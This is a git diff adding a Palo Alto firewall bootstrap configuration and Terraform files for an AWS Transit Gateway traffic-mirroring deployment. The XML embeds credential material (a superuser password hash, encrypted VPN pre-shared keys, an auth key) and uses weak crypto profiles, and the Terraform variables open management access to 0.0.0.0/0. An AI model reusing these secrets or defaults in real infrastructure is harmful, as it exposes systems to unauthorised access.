+      <entry name="fwadmin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$kouigbds$mrNbt/msQehCS55jxNnYa.</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+                <interface-management-profile>LB HealthCheck</interface-management-profile>
+              </layer3>
+              <link-state>up</link-state>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+              <link-state>down</link-state>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="LB HealthCheck">
+              <http>yes</http>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway>
+            <entry name="VPN1">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>34.252.94.101</ip>
+              </peer-address>
+            </entry>
+            <entry name="VPN2">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>52.211.42.95</ip>
+              </peer-address>
+            </entry>
+          </gateway>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="vr">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FW-1</hostname>
+          <panorama-server>18.224.86.63</panorama-server>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <panorama-server>18.224.86.63</panorama-server>
+              <dns-primary>8.8.8.8</dns-primary>
+              <vm-auth-key>382932559738703</vm-auth-key>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3/>
+              </network>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3/>
+              </network>
+            </entry>
+            <entry name="mirror">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="Mirror" uuid="737b22fb-872e-4a9e-811b-8489ca19a32e">
+                  <to>
+                    <member>mirror</member>
+                  </to>
+                  <from>
+                    <member>mirror</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <rule-type>intrazone</rule-type>
+                  <profile-setting>
+                    <profiles>
+                      <url-filtering>
+                        <member>default</member>
+                      </url-filtering>
+                      <file-blocking>
+                        <member>strict file blocking</member>
+                      </file-blocking>
+                      <virus>
+                        <member>default</member>
+                      </virus>
+                      <spyware>
+                        <member>strict</member>
+                      </spyware>
+                      <vulnerability>
+                        <member>strict-1</member>
+                      </vulnerability>
+                      <wildfire-analysis>
+                        <member>default</member>
+                      </wildfire-analysis>
+                    </profiles>
+                  </profile-setting>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT" uuid="15fd5339-09b4-4e44-964b-8f900d99a75e">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1" uuid="c12a4b77-9742-4035-b1a1-f166c3626fd8">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.45</translated-address>
+                  </destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2" uuid="ddb09b41-3f36-4419-9b9e-daf33697d276">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1" uuid="e2581a90-3016-4ea5-87b7-dad8ad74372f">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2" uuid="dc4b1a56-4681-4a98-803b-41cfacb37e76">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="EW" uuid="07097b54-9c54-48e6-88cc-fd5f7b4445ef">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>10.0.0.0/8</member>
+                  </source>
+                  <destination>
+                    <member>10.0.0.0/8</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default" uuid="31e54e4c-a95a-4e42-9600-cff312dc1178">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default" uuid="47e6793d-f393-408e-bced-739fdaed964f">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <tunnel-inspect>
+              <rules>
+                <entry name="mirror" uuid="073a6b9a-342f-4fbd-8090-445752b19a31">
+                  <monitor-options>
+                    <log-setting-override>
+                      <enable>no</enable>
+                    </log-setting-override>
+                  </monitor-options>
+                  <application>
+                    <member>vxlan</member>
+                  </application>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                </entry>
+              </rules>
+            </tunnel-inspect>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <profiles>
+            <vulnerability>
+              <entry name="strict-1">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+            </vulnerability>
+            <custom-url-category/>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt
new file mode 100644
index 00000000..8d8c673c
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files4/init-cfg.txt
@@ -0,0 +1,19 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=8.8.8.8
+dns-secondary=
+vm-auth-key=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/aws/TGW-VPC-Mirroring/nlb.tf b/aws/TGW-VPC-Mirroring/nlb.tf
new file mode 100644
index 00000000..3835c45f
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/nlb.tf
@@ -0,0 +1,39 @@
+resource "aws_lb" "mirror-lb" {
+  name               = "mirror-lb-tf"
+  internal           = true
+  load_balancer_type = "network"
+  subnets            = ["${aws_subnet.vpc_mirror_pub_1.id}","${aws_subnet.vpc_mirror_pub_2.id}"]
+  
+  enable_deletion_protection = false
+  enable_cross_zone_load_balancing = true
+  tags = {
+  }
+}
+resource "aws_lb_target_group" "mirror-target" {
+  name     = "mirror-target"
+  port     = 4789
+  protocol = "UDP"
+  vpc_id   = "${aws_vpc.vpc_security.id}"
+  health_check {
+      port = 80
+      protocol = "HTTP"
+  }
+}
+resource "aws_lb_listener" "mirror-listener" {
+  load_balancer_arn = "${aws_lb.mirror-lb.arn}"
+  port              = "4789"
+  protocol          = "UDP"
+
+  default_action {
+    type             = "forward"
+    target_group_arn = "${aws_lb_target_group.mirror-target.arn}"
+  }
+}
+resource "aws_lb_target_group_attachment" "mirror1" {
+  target_group_arn = "${aws_lb_target_group.mirror-target.arn}"
+  target_id        = "${module.ngfw3.instanceid}"
+}
+resource "aws_lb_target_group_attachment" "mirror3" {
+  target_group_arn = "${aws_lb_target_group.mirror-target.arn}"
+  target_id        = "${module.ngfw4.instanceid}"
+}
\ No newline at end of file
diff --git a/aws/TGW-VPC-Mirroring/providers.tf b/aws/TGW-VPC-Mirroring/providers.tf
new file mode 100644
index 00000000..af7b0ba3
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/providers.tf
@@ -0,0 +1,3 @@
+provider "aws" {
+  region     = "${var.aws_region}"
+}
diff --git a/aws/TGW-VPC-Mirroring/tgw.tf b/aws/TGW-VPC-Mirroring/tgw.tf
new file mode 100644
index 00000000..191dce08
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/tgw.tf
@@ -0,0 +1,51 @@
+resource "aws_ec2_transit_gateway" "tgw" {
+  description                     = "Transit Gateway"
+  vpn_ecmp_support                = "enable"
+  default_route_table_association = "disable"
+  default_route_table_propagation = "disable"
+  dns_support                     = "enable"
+  auto_accept_shared_attachments  = "disable"
+
+  tags {
+    Name = "transit_gateway"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table" "tgw_security" {
+  transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  tags {
+    Name = "tgw-rtb-security"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table" "tgw_spokes" {
+  transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  tags {
+    Name = "tgw-rtb-spokes"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route" "default" {
+  destination_cidr_block         = "0.0.0.0/0"
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}"
+  transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+}
+
+resource "aws_ec2_transit_gateway_route_table_association" "vpc_security" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}"
+  transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
+
+resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_security" {
+  vpc_id                                          = "${aws_vpc.vpc_security.id}"
+  subnet_ids                                      = ["${aws_subnet.vpc_security_tgw_1.id}", "${aws_subnet.vpc_security_tgw_2.id}"]
+  transit_gateway_id                              = "${aws_ec2_transit_gateway.tgw.id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags {
+    Name = "tgw_attachment_security"
+  }
+}
diff --git a/aws/TGW-VPC-Mirroring/variables.tf b/aws/TGW-VPC-Mirroring/variables.tf
new file mode 100644
index 00000000..80613943
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/variables.tf
@@ -0,0 +1,181 @@
+//This section should be verified and modified accordingly.
+
+variable aws_region {
+  description = "AWS Region for deployment"
+  default     = "us-east-2"
+}
+
+variable aws_key {
+  description = "aws_key"
+  default     = "AWS--Key"
+}
+
+//Do not create these.  The Terraform will do that.  Just need to make secure
+//the s3 bucket names are unique.
+
+variable bootstrap_s3bucket {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "tgw-bucket-1"
+}
+
+variable bootstrap_s3bucket2 {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "tgw-bucket-2"
+}
+variable bootstrap_s3bucket3 {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "tgw-bucket-3"
+}
+
+variable bootstrap_s3bucket4 {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "tgw-bucket-4"
+}
+//End of the section that MUST be modified to work
+variable management_cidr {
+  description = "CIDR Address for Management Access"
+  default     = "0.0.0.0/0"
+}
+
+variable vpc_security_cidr {
+  description = "CIDR Address for Security VPC"
+  default     = "192.168.0.0/16"
+}
+
+variable vpc_security_subnet_public_1 {
